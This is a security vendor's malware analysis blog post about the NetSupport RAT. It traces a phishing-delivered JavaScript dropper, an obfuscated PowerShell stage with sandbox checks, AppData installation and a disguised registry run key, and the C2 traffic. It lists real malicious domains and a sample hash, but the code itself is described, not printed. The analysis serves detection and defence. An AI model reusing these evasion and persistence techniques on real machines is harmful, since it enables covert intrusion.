Into the Rat’s Nest: A SenseOn Analysis of the NetSupport RAT
Threat actors prefer deploying tools which appear genuine and expected in a business IT environment. This provides camouflage for their toolset, blending into organisations' application portfolios. NetSupport Manager, a remote access tool, has been utilised by system administrators since its release in 1989 and has been used by threat actors since at least 2016. The tool is similar to AnyDesk or TeamViewer, applications used by admins and IT help desk personnel to remotely access devices for maintenance purposes. These technologies have been, and continue to be, abused by attackers in the form of remote access trojans (RATs). This blog post will specifically examine the NetSupport RAT, its history, a static and dynamic analysis of the RAT itself, and indicators of compromise (IOCs).
Background
The NetSupport RAT has been observed in campaigns throughout 2023, previously examined by Trellix and Carbon Black. The RAT has primarily been distributed through deceptive Google Chrome update downloads in the latter half of 2023. Attackers have also been observed injecting redirection code (or the malware itself) into legitimate, compromised websites to make the downloads appear trusted. This reduces the chance of the malware-hosting site being blocked and increases the probability of successful infection.
Attribution of the NetSupport RAT is typically futile, as the simplicity and ease-of-use of the tool allow a wide range of attackers to employ the tool in their attacks.
This blog will take a look at a sample of the NetSupport RAT discovered in December of 2022, provided by ‘malware-traffic-analysis.net’. In this instance, the initial attack vector was a phishing email masquerading as an email from USPS detailing a package shipment.
Static Analysis
To break down the NetSupport RAT, we can first statically examine and dissect the malware into its three primary components: the initial JavaScript dropper, its subsequent PowerShell script, and the trojanised NetSupport executable. The initial JavaScript file is rather lightweight and simple after deobfuscation.
JavaScript Dropper
In all, the malicious JavaScript file, named ‘5645_M.js’, is 641 lines of highly obfuscated JavaScript. Below is a small section of the code.
The script primarily uses numerous functions and arrays for obfuscation in an attempt to evade detection and increase the difficulty of analysis. Using popular JavaScript deobfuscation tools such as deobfuscate.io and deobfuscate relative, we can reduce the code to 56 lines, and identify the primary payload that is executed using the JavaScript below.
Using CyberChef we can further deobfuscate the command by replacing ‘<’ characters with ‘%’ and using the URL decode function to return the raw script. Below is the cleaned-up version of the command, excluding comments, properly naming variables, and applying concatenations.
Now we can see a Base64 encoded PowerShell command. This command decodes to the following PowerShell command, used to retrieve the malicious ‘index.php’ file.
PowerShell Script
The next stage is the execution of a PowerShell script, masquerading as a PHP file named ‘index.php’. This script is 262 lines of obfuscated PowerShell, largely using concatenation, arrays and variables, however, this script is much more readable. Below is a portion of the script.
After deobfuscation, we can see the script essentially achieves the following:
Checks the path of the script for indicators of analysis, searching for strings such as ‘sandbox’, ‘analysis’, and ‘malware’.
Install NetSupport in an ‘AppData\’ random directory. The paths and files themselves are declared earlier in the script.
Creates a registry run key for persistence named ‘Software Updater’.
Runs the malicious NetSupport executable (presentationhost.exe).
NetSupport Manager
The primary program ‘presentationhost.exe’ and its components can be seen heavily flagged on VirusTotal. Examination of the program and its configuration files reveals the C2 configuration, seen below within the ‘client32.ini’ configuration file.
We can also view numerous client configurations curated to hide the client from the victim user.
Dynamic Analysis
Due to the varying nature of initial access, we obtained the JavaScript file which was originally delivered via a zip file, hosted on a URL (lbbyqrluzu.cracknight[.]ru), included in the phishing email. To observe the RAT in action and SenseOn’s detection capabilities against it, we executed the malicious JavaScript file for dynamic analysis in a sandbox environment. We can see the SenseOn endpoint agent immediately detected the malicious JavaScript file executed by WScript.
Following its execution, the WScript process spawns the encoded PowerShell command we decoded in our static analysis.
The command decodes to the plaintext in Figure 5, creating a web-client object to retrieve and execute ‘index.php’.
By examining DNS telemetry, we can see retrieving the payload has been unsuccessful due to a failed resolution of the malicious domain name.
In a previous analysis of the RAT, this DNS query was seen as successful. In connecting to the domain, the SenseOn observation below was generated.
Luckily, the PowerShell script file, ‘index.php’, is provided for us in the artefacts from ‘malware-traffic-analysis.net’.
After execution, we can see a suspicious directory, ‘X4YaToyF’, created under the ‘AppData/Roaming’ directory. This is the location of the NetSupport installation. Below we can see the primary executable, DLLs, and configuration files.
We can also view the persistence mechanism within the Windows registry, ambiguously named ‘SoftwareUpdater’ which executes ‘presentationhost.exe’.
Immediately following the execution, SenseOn detected the suspicious program ‘presentationhost.exe’ launching NetSupport from PowerShell.
As a result of these suspicious processes, SenseOn raised a high-priority case correlating multiple observations detected on the infected device.
Upon execution of ‘presentationhost.exe’, the program makes an HTTP request to ‘geo.netsupportsoftware.com’ to retrieve the victim's geolocation.
Following this, we can see attempts and failures to resolve C2 domain ‘npinmclaugh11[.]com’, however, ‘npinmclaugh14[.]com’ is seen resolving successfully.
After the DNS request was successful, a connection was established to the server. This connection triggered a detection for a suspicious network connection seen below.
Two HTTP requests were then sent over non-standard port 2145 to the malicious domain, which were both met with a ‘200 OK’ response. Since this request is sent in HTTP, we can view the request URI to see what specific resource was retrieved. Here we can view it as ‘fakeurl.htm’.
In the ‘request form data’ fields of these requests, we see the following values decoded from Base64 obfuscated text. The first HTTP request decodes to the plaintext below.
The second HTTP request decodes to the following, with an encrypted DATA field.
This analysis of the NetSupport RAT is congruent with the most recent samples, such as the sample analysed below taken from MalwareBazaar first seen on January 9th, 2024. (fef8bdf50c19a012bfdc9da3f4ea4cab39075637ca527f24af79575007b2befe).
As shown above, the C2 configuration remains within the client.ini configuration file. Upon execution of the client32.exe’ executable, we can view the RAT making nearly identical HTTP requests to ‘geo.netsupportsoftware[.]com’ and the C2 server specified in the configuration file.
Below we can see the C2 server response with a 400 Bad Request with the request_form_data field again filled with a Base64 encoded string identical to the string sent from the first sample.
This is where our dynamic analysis ends. From this analysis, we learned and detected multiple techniques used by the RAT including execution, defense evasion, persistence and C2 communications.
IoCs
Files/hashes
Domains/IPs